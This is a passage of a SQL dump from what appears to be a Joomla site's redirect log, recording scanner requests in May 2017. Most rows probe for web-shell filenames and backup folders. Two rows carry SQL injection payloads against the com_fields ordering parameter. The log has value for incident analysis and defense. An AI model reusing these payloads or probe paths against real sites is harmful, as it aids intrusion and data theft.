00:00:00',301),(9591,'http://ekvatorprint.com.ua/administrator/components/com_plugins/models/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_plugins/models/update.php','',1,0,'2017-05-13 20:34:28','0000-00-00 00:00:00',301),(9592,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/levels/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/levels/backup.php','',1,0,'2017-05-13 20:34:28','0000-00-00 00:00:00',301),(9593,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/warnings/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/warnings/backup.php','',1,0,'2017-05-13 20:34:28','0000-00-00 00:00:00',301),(9594,'http://ekvatorprint.com.ua/favicon.php',NULL,'http://ekvatorprint.com.ua/favicon.php','',1,0,'2017-05-13 20:34:57','0000-00-00 00:00:00',301),(9595,'http://ekvatorprint.com.ua/images/56731933787a0.php',NULL,'http://ekvatorprint.com.ua/images/56731933787a0.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9596,'http://ekvatorprint.com.ua/components/com_finder/yf23d0.php',NULL,'http://ekvatorprint.com.ua/components/com_finder/yf23d0.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9597,'http://ekvatorprint.com.ua/images/banners/setup.php',NULL,'http://ekvatorprint.com.ua/images/banners/setup.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9598,'http://ekvatorprint.com.ua/images/documentos/version.php',NULL,'http://ekvatorprint.com.ua/images/documentos/version.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9599,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/popups/jcemediabox/update.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/popups/jcemediabox/update.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9600,'http://ekvatorprint.com.ua/images/banners/smile.php',NULL,'http://ekvatorprint.com.ua/images/banners/smile.php','',5,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9601,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/importcss/xml_get_current_line_number.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/importcss/xml_get_current_line_number.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9602,'http://ekvatorprint.com.ua/images/cmsbuild.php',NULL,'http://ekvatorprint.com.ua/images/cmsbuild.php','',1,0,'2017-05-13 20:34:58','0000-00-00 00:00:00',301),(9603,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/layer/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/layer/backup.php','',1,0,'2017-05-13 20:34:59','0000-00-00 00:00:00',301),(9604,'http://ekvatorprint.com.ua/gmlt.php',NULL,'http://ekvatorprint.com.ua/gmlt.php','',1,0,'2017-05-13 20:34:59','0000-00-00 00:00:00',301),(9605,'http://ekvatorprint.com.ua/images/imageshark.php',NULL,'http://ekvatorprint.com.ua/images/imageshark.php','',1,0,'2017-05-13 20:35:30','0000-00-00 00:00:00',301),(9606,'http://ekvatorprint.com.ua/images/mainplag.php',NULL,'http://ekvatorprint.com.ua/images/mainplag.php','',1,0,'2017-05-13 20:35:30','0000-00-00 00:00:00',301),(9607,'http://ekvatorprint.com.ua/images/xml-rpcc.php',NULL,'http://ekvatorprint.com.ua/images/xml-rpcc.php','',1,0,'2017-05-13 20:35:30','0000-00-00 00:00:00',301),(9608,'http://ekvatorprint.com.ua/images/from.php',NULL,'http://ekvatorprint.com.ua/images/from.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9609,'http://ekvatorprint.com.ua/images/set.php',NULL,'http://ekvatorprint.com.ua/images/set.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9610,'http://ekvatorprint.com.ua/images/sys.php',NULL,'http://ekvatorprint.com.ua/images/sys.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9611,'http://ekvatorprint.com.ua/images/foro_hacia_donde_va_el_tolima/version.php',NULL,'http://ekvatorprint.com.ua/images/foro_hacia_donde_va_el_tolima/version.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9612,'http://ekvatorprint.com.ua/images/legacy.cms.php',NULL,'http://ekvatorprint.com.ua/images/legacy.cms.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9613,'http://ekvatorprint.com.ua/images/loptof.php',NULL,'http://ekvatorprint.com.ua/images/loptof.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9614,'http://ekvatorprint.com.ua/images/pot.php',NULL,'http://ekvatorprint.com.ua/images/pot.php','',1,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9615,'http://ekvatorprint.com.ua/images/media.php',NULL,'http://ekvatorprint.com.ua/images/media.php','',2,0,'2017-05-13 20:35:31','0000-00-00 00:00:00',301),(9616,'http://ekvatorprint.com.ua/libraries/rokcommon/overrides/doctrine/migration/config.php',NULL,'http://ekvatorprint.com.ua/libraries/rokcommon/overrides/doctrine/migration/config.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9617,'http://ekvatorprint.com.ua/logs/sh404sef/sec/sowkt/ijos.php',NULL,'http://ekvatorprint.com.ua/logs/sh404sef/sec/sowkt/ijos.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9618,'http://ekvatorprint.com.ua/ipqt7a.php',NULL,'http://ekvatorprint.com.ua/ipqt7a.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9619,'http://ekvatorprint.com.ua/libraries/cms/component/stopgloal.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/component/stopgloal.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9620,'http://ekvatorprint.com.ua/logs/sh404sef/sec/onrxy/ogycuro.php',NULL,'http://ekvatorprint.com.ua/logs/sh404sef/sec/onrxy/ogycuro.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9621,'http://ekvatorprint.com.ua/libraries/joomla/google/data/picasa/config.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/google/data/picasa/config.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9622,'http://ekvatorprint.com.ua/libraries/rokcommon/doctrine/connection/mssql/config.php',NULL,'http://ekvatorprint.com.ua/libraries/rokcommon/doctrine/connection/mssql/config.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9623,'http://ekvatorprint.com.ua/layouts/joomla/edit/backup.php',NULL,'http://ekvatorprint.com.ua/layouts/joomla/edit/backup.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9624,'http://ekvatorprint.com.ua/logs/sh404sef/sec/config.php',NULL,'http://ekvatorprint.com.ua/logs/sh404sef/sec/config.php','',1,0,'2017-05-13 20:36:01','0000-00-00 00:00:00',301),(9625,'http://ekvatorprint.com.ua/logs/sh404sef/sec/backup.php',NULL,'http://ekvatorprint.com.ua/logs/sh404sef/sec/backup.php','',1,0,'2017-05-13 20:36:02','0000-00-00 00:00:00',301),(9626,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/advlist/backup.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/advlist/backup.php','',1,0,'2017-05-13 20:36:02','0000-00-00 00:00:00',301),(9627,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/paste/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/paste/config.php','',1,0,'2017-05-13 20:36:02','0000-00-00 00:00:00',301),(9628,'http://ekvatorprint.com.ua/layouts/joomla/content/info_block/backup.php',NULL,'http://ekvatorprint.com.ua/layouts/joomla/content/info_block/backup.php','',1,0,'2017-05-13 20:36:02','0000-00-00 00:00:00',301),(9629,'http://ekvatorprint.com.ua/libraries/jquery/v1.11.0/loc.php',NULL,'http://ekvatorprint.com.ua/libraries/jquery/v1.11.0/loc.php','',1,0,'2017-05-13 20:36:02','0000-00-00 00:00:00',301),(9630,'http://ekvatorprint.com.ua/modules/mod_roksprocket/lib/backup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_roksprocket/lib/backup.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9631,'http://ekvatorprint.com.ua/modules/mod_mijopolls/version.php',NULL,'http://ekvatorprint.com.ua/modules/mod_mijopolls/version.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9632,'http://ekvatorprint.com.ua/modules/mod_pwebcontact/setup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_pwebcontact/setup.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9633,'http://ekvatorprint.com.ua/media/plg_system_stats/version.php',NULL,'http://ekvatorprint.com.ua/media/plg_system_stats/version.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9634,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/slide-menues.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/slide-menues.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9635,'http://ekvatorprint.com.ua/nwhtq.php',NULL,'http://ekvatorprint.com.ua/nwhtq.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9636,'http://ekvatorprint.com.ua/modules/mod_random_image/media-views-rtl.php',NULL,'http://ekvatorprint.com.ua/modules/mod_random_image/media-views-rtl.php','',3,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9637,'http://ekvatorprint.com.ua/media/system/system.php',NULL,'http://ekvatorprint.com.ua/media/system/system.php','',2,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9638,'http://ekvatorprint.com.ua/modules/mod_related_items/tmpl/update.php',NULL,'http://ekvatorprint.com.ua/modules/mod_related_items/tmpl/update.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9639,'http://ekvatorprint.com.ua/modules/mod_itpgads_5034/plugins.php',NULL,'http://ekvatorprint.com.ua/modules/mod_itpgads_5034/plugins.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9640,'http://ekvatorprint.com.ua/modules/mod_login/version.php',NULL,'http://ekvatorprint.com.ua/modules/mod_login/version.php','',1,0,'2017-05-13 20:36:32','0000-00-00 00:00:00',301),(9641,'http://ekvatorprint.com.ua/modules/mod_articles_news/version.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_news/version.php','',1,0,'2017-05-13 20:36:33','0000-00-00 00:00:00',301),(9642,'http://ekvatorprint.com.ua/modules/mod_sp_quickcontact/assets/stopgloal.php',NULL,'http://ekvatorprint.com.ua/modules/mod_sp_quickcontact/assets/stopgloal.php','',1,0,'2017-05-13 20:36:33','0000-00-00 00:00:00',301),(9643,'http://ekvatorprint.com.ua/plugins/jsnimageshow/sourcepicasa/install/smile.php',NULL,'http://ekvatorprint.com.ua/plugins/jsnimageshow/sourcepicasa/install/smile.php','',1,0,'2017-05-13 20:37:01','0000-00-00 00:00:00',301),(9644,'http://ekvatorprint.com.ua/ojla.php',NULL,'http://ekvatorprint.com.ua/ojla.php','',1,0,'2017-05-13 20:37:01','0000-00-00 00:00:00',301),(9645,'http://ekvatorprint.com.ua/tmp/kd.php',NULL,'http://ekvatorprint.com.ua/tmp/kd.php','',3,0,'2017-05-13 20:37:01','0000-00-00 00:00:00',301),(9646,'http://ekvatorprint.com.ua/plugins/content/pagebreak/backup.php',NULL,'http://ekvatorprint.com.ua/plugins/content/pagebreak/backup.php','',1,0,'2017-05-13 20:37:01','0000-00-00 00:00:00',301),(9647,'http://ekvatorprint.com.ua/plugins/search/rtl.php',NULL,'http://ekvatorprint.com.ua/plugins/search/rtl.php','',1,0,'2017-05-13 20:37:01','0000-00-00 00:00:00',301),(9648,'http://ekvatorprint.com.ua/reyochc.php',NULL,'http://ekvatorprint.com.ua/reyochc.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9649,'http://ekvatorprint.com.ua/plugins/system/jsntplframework/language/pl-pl/cmsbuild.php',NULL,'http://ekvatorprint.com.ua/plugins/system/jsntplframework/language/pl-pl/cmsbuild.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9650,'http://ekvatorprint.com.ua/plugins/content/pagebreak/config.php',NULL,'http://ekvatorprint.com.ua/plugins/content/pagebreak/config.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9651,'http://ekvatorprint.com.ua/plugins/content/pagebreak/update.php',NULL,'http://ekvatorprint.com.ua/plugins/content/pagebreak/update.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9652,'http://ekvatorprint.com.ua/plugins/content/contact/backup.php',NULL,'http://ekvatorprint.com.ua/plugins/content/contact/backup.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9653,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/session_commit.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/session_commit.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9654,'http://ekvatorprint.com.ua/plugins/editors/version.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/version.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9655,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/chgrp.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/chgrp.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9656,'http://ekvatorprint.com.ua/templates/beez3/html/com_content/backup.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/html/com_content/backup.php','',1,0,'2017-05-13 20:37:02','0000-00-00 00:00:00',301),(9657,'http://ekvatorprint.com.ua/yvucr.php',NULL,'http://ekvatorprint.com.ua/yvucr.php','',1,0,'2017-05-13 20:37:29','0000-00-00 00:00:00',301),(9658,'http://ekvatorprint.com.ua/tmp/s.php',NULL,'http://ekvatorprint.com.ua/tmp/s.php','',2,0,'2017-05-13 20:37:30','0000-00-00 00:00:00',301),(9659,'http://ekvatorprint.com.ua/backup/2014/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-14 07:55:30','0000-00-00 00:00:00',301),(9660,'http://ekvatorprint.com.ua/backup/2016/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 10:51:51','0000-00-00 00:00:00',301),(9661,'http://ekvatorprint.com.ua/backup/2017/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-14 12:20:14','0000-00-00 00:00:00',301),(9662,'http://ekvatorprint.com.ua/backup/2016-01/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-14 13:48:02','0000-00-00 00:00:00',301),(9663,'http://ekvatorprint.com.ua/backup/2016-03/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 16:44:22','0000-00-00 00:00:00',301),(9664,'http://ekvatorprint.com.ua/backup/2016-04/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 18:12:13','0000-00-00 00:00:00',301),(9665,'http://ekvatorprint.com.ua/backup/2016-05/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 19:40:27','0000-00-00 00:00:00',301),(9666,'http://ekvatorprint.com.ua/backup/2016-06/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 21:08:41','0000-00-00 00:00:00',301),(9667,'http://ekvatorprint.com.ua/backup/2016-07/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-14 22:36:33','0000-00-00 00:00:00',301),(9668,'http://ekvatorprint.com.ua/backup/2016-08/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-15 00:04:43','0000-00-00 00:00:00',301),(9669,'http://ekvatorprint.com.ua/backup/2016-09/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 01:33:18','0000-00-00 00:00:00',301),(9670,'http://ekvatorprint.com.ua/backup/2016-10/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 03:01:41','0000-00-00 00:00:00',301),(9671,'http://ekvatorprint.com.ua/backup/2016-11/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 04:29:58','0000-00-00 00:00:00',301),(9672,'http://ekvatorprint.com.ua/backup/2017-01/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 07:26:26','0000-00-00 00:00:00',301),(9673,'http://ekvatorprint.com.ua/backup/2017-04/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 11:52:16','0000-00-00 00:00:00',301),(9674,'http://ekvatorprint.com.ua/backup/2017-05/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-05-15 13:20:44','0000-00-00 00:00:00',301),(9675,'http://ekvatorprint.com.ua/components/com_stalytics2/trackHeat.php',NULL,'http://www.google.com/','',1,0,'2017-05-16 08:51:24','0000-00-00 00:00:00',301),(9676,'http://ekvatorprint.com.ua/components/com_kontakt/task,new_request/',NULL,'http://www.google.com/','',1,0,'2017-05-16 12:49:06','0000-00-00 00:00:00',301),(9677,'http://ekvatorprint.com.ua/downloads/backup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-16 16:20:48','0000-00-00 00:00:00',301),(9678,'http://ekvatorprint.com.ua/upload/backup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-16 18:05:33','0000-00-00 00:00:00',301),(9679,'http://ekvatorprint.com.ua/shop/category/156-izotermika/index.php?available_date[]=1&catid[]=156&DescOrderBy=ASC&Itemid=2&mf_id[]=55&option=com_vm_ext_search_pro&order_by=product_name&pf=0&product_type_id[]=4&pt=0',NULL,'http://www.google.com/','',1,0,'2017-05-16 21:15:51','0000-00-00 00:00:00',301),(9680,'http://ekvatorprint.com.ua/shop/category/156-izotermika/index.php?available_date[]=1331596800&catid[]=156&DescOrderBy=ASC&Itemid=2&mf_id[]=1&option=com_vm_ext_search_pro&order_by=product_name&pf=0&product_type_id[]=4&pt=0',NULL,'http://www.google.com/','',1,0,'2017-05-17 00:36:52','0000-00-00 00:00:00',301),(9681,'http://ekvatorprint.com.ua/bkpabsentadaulawl2/',NULL,'http://ekvatorprint.com.ua/NOT_EXISTING_URLasdhhjsad73i234oi34/','',8,0,'2017-05-17 02:38:53','0000-00-00 00:00:00',301),(9682,'http://ekvatorprint.com.ua/wp-feed.php',NULL,'','',11,0,'2017-05-18 03:19:53','0000-00-00 00:00:00',301),(9683,'http://ekvatorprint.com.ua/shop/category/index.php?catid[]=1&DescOrderBy=ASC&Itemid=2&option=com_vm_ext_search_pro&order_by=product_name',NULL,'http://www.google.com/','',1,0,'2017-05-19 09:33:55','0000-00-00 00:00:00',301),(9684,'http://ekvatorprint.com.ua/backup/2016-02/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-19 10:14:26','0000-00-00 00:00:00',301),(9685,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1,extractvalue(null,concat(0x3b,(select database())))--',NULL,'','',2,0,'2017-05-19 13:34:07','0000-00-00 00:00:00',301),(9686,'http://ekvatorprint.com.ua/shop/category/index.php?available_date[]=1331078400&catid[]=182&DescOrderBy=ASC&Itemid=2&mf_id[]=1&option=com_vm_ext_search_pro&order_by=product_name&pf=0&pt=0',NULL,'http://www.google.com/','',1,0,'2017-05-19 15:50:58','0000-00-00 00:00:00',301),(9687,'http://ekvatorprint.com.ua/backup/2016-12/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-20 13:12:10','0000-00-00 00:00:00',301),(9688,'http://ekvatorprint.com.ua/index.php?Itemid=65&lang=en&option=com_cinesupport&view=rentalevents',NULL,'http://www.google.com/','',6,0,'2017-05-20 15:00:42','0000-00-00 00:00:00',301),(9689,'http://ekvatorprint.com.ua/ec5618e91bc84b2e183f6853d5e784d2',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2017-05-20 15:38:38','0000-00-00 00:00:00',301),(9690,'http://ekvatorprint.com.ua/backup/2017-02/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-20 16:38:04','0000-00-00 00:00:00',301),(9691,'http://ekvatorprint.com.ua/backup/2017-06/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-20 23:21:33','0000-00-00 00:00:00',301),(9692,'http://ekvatorprint.com.ua/LICENSE.php',NULL,'','',6,0,'2017-05-21 02:40:46','0000-00-00 00:00:00',301),(9693,'http://ekvatorprint.com.ua/backup3/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 04:31:48','0000-00-00 00:00:00',301),(9694,'http://ekvatorprint.com.ua/backup4/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 06:14:36','0000-00-00 00:00:00',301),(9695,'http://ekvatorprint.com.ua/backup5/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 07:57:36','0000-00-00 00:00:00',301),(9696,'http://ekvatorprint.com.ua/backup6/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 09:38:11','0000-00-00 00:00:00',301),(9697,'http://ekvatorprint.com.ua/backup7/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 11:19:14','0000-00-00 00:00:00',301),(9698,'http://ekvatorprint.com.ua/wp-rdf.php',NULL,'','',8,0,'2017-05-21 12:42:25','0000-00-00 00:00:00',301),(9699,'http://ekvatorprint.com.ua/backup8/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 13:01:01','0000-00-00 00:00:00',301),(9700,'http://ekvatorprint.com.ua/backup9/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-21 14:42:29','0000-00-00 00:00:00',301),(9701,'http://ekvatorprint.com.ua/administrator/components/com_mobilejoomla/override/html/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_mobilejoomla/override/html/config.php','',1,0,'2017-05-21 22:46:50','0000-00-00 00:00:00',301),(9702,'http://ekvatorprint.com.ua/administrator/fs-login.php',NULL,'http://ekvatorprint.com.ua/administrator/fs-login.php','',1,0,'2017-05-21 22:46:50','0000-00-00 00:00:00',301),(9703,'http://ekvatorprint.com.ua/components/com_content/models/sh1.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/sh1.php','',1,0,'2017-05-21 22:46:50','0000-00-00 00:00:00',301),(9704,'http://ekvatorprint.com.ua/administrator/components/com_hello/from.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_hello/from.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9705,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/sql/install/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/sql/install/update.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9706,'http://ekvatorprint.com.ua/components/com_content/models/setup.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/setup.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9707,'http://ekvatorprint.com.ua/administrator/modules/mod_version/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_version/tmpl/backup.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9708,'http://ekvatorprint.com.ua/components/com_jce/media/wp-setup.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/media/wp-setup.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9709,'http://ekvatorprint.com.ua/administrator/components/com_roksprocket/views/contentbuilderitems/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_roksprocket/views/contentbuilderitems/config.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9710,'http://ekvatorprint.com.ua/administrator/includes/system.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/system.php','',2,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9711,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_tags/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_tags/config.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9712,'http://ekvatorprint.com.ua/components/com_helloworld/hello.php',NULL,'http://ekvatorprint.com.ua/components/com_helloworld/hello.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9713,'http://ekvatorprint.com.ua/components/com_content/views/category/dydjjix.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/category/dydjjix.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9714,'http://ekvatorprint.com.ua/components/com_media/h07ffi.php',NULL,'http://ekvatorprint.com.ua/components/com_media/h07ffi.php','',1,0,'2017-05-21 22:46:51','0000-00-00 00:00:00',301),(9715,'http://ekvatorprint.com.ua/libraries/gmdate.php',NULL,'http://ekvatorprint.com.ua/libraries/gmdate.php','',1,0,'2017-05-21 22:47:47','0000-00-00 00:00:00',301),(9716,'http://ekvatorprint.com.ua/images/sampledata/fruitshop/smile.php',NULL,'http://ekvatorprint.com.ua/images/sampledata/fruitshop/smile.php','',1,0,'2017-05-21 22:47:47','0000-00-00 00:00:00',301),(9717,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/tiddlywiki/timezone_offset_get.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/tiddlywiki/timezone_offset_get.php','',1,0,'2017-05-21 22:47:47','0000-00-00 00:00:00',301),(9718,'http://ekvatorprint.com.ua/includes/main.inc.php',NULL,'http://ekvatorprint.com.ua/includes/main.inc.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9719,'http://ekvatorprint.com.ua/images/green.php',NULL,'http://ekvatorprint.com.ua/images/green.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9720,'http://ekvatorprint.com.ua/libraries/cms/toolbar/button/media-views-rtl.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/toolbar/button/media-views-rtl.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9721,'http://ekvatorprint.com.ua/wp-inc.php',NULL,'http://ekvatorprint.com.ua/wp-inc.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9722,'http://ekvatorprint.com.ua/plugins/mod.php',NULL,'http://ekvatorprint.com.ua/plugins/mod.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9723,'http://ekvatorprint.com.ua/libraries/joomla/user/temp.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/user/temp.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9724,'http://ekvatorprint.com.ua/layouts/libraries/cms/html/bootstrap/setup.php',NULL,'http://ekvatorprint.com.ua/layouts/libraries/cms/html/bootstrap/setup.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9725,'http://ekvatorprint.com.ua/plugins/system/t3/base-bs3/html/com_contact/category/substr_replace.php',NULL,'http://ekvatorprint.com.ua/plugins/system/t3/base-bs3/html/com_contact/category/substr_replace.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9726,'http://ekvatorprint.com.ua/templates/system/jmp-contects.php',NULL,'http://ekvatorprint.com.ua/templates/system/jmp-contects.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9727,'http://ekvatorprint.com.ua/templates/beez3/images/system/backup.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/images/system/backup.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9728,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/print.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/print.php','',1,0,'2017-05-21 22:47:48','0000-00-00 00:00:00',301),(9729,'http://ekvatorprint.com.ua/back/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 02:21:44','0000-00-00 00:00:00',301),(9730,'http://ekvatorprint.com.ua/templates/jtemplate/index.html',NULL,'http://ekvatorprint.com.ua/templates/jtemplate/index.html','',1,0,'2017-05-22 03:13:18','0000-00-00 00:00:00',301),(9731,'http://ekvatorprint.com.ua/bak/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 03:49:29','0000-00-00 00:00:00',301),(9732,'http://ekvatorprint.com.ua/Vmbackup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 05:16:59','0000-00-00 00:00:00',301),(9733,'http://ekvatorprint.com.ua/htdocs.bak',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 06:44:15','0000-00-00 00:00:00',301),(9734,'http://ekvatorprint.com.ua/_db_backups/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 08:13:05','0000-00-00 00:00:00',301),(9735,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8109 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(8109=8109,1))),0x71786b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)',NULL,'http://www.google.com/','',2,0,'2017-05-22 08:44:14','0000-00-00 00:00:00',301),(9736,'http://ekvatorprint.com.ua/_db_backup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 11:36:50','0000-00-00 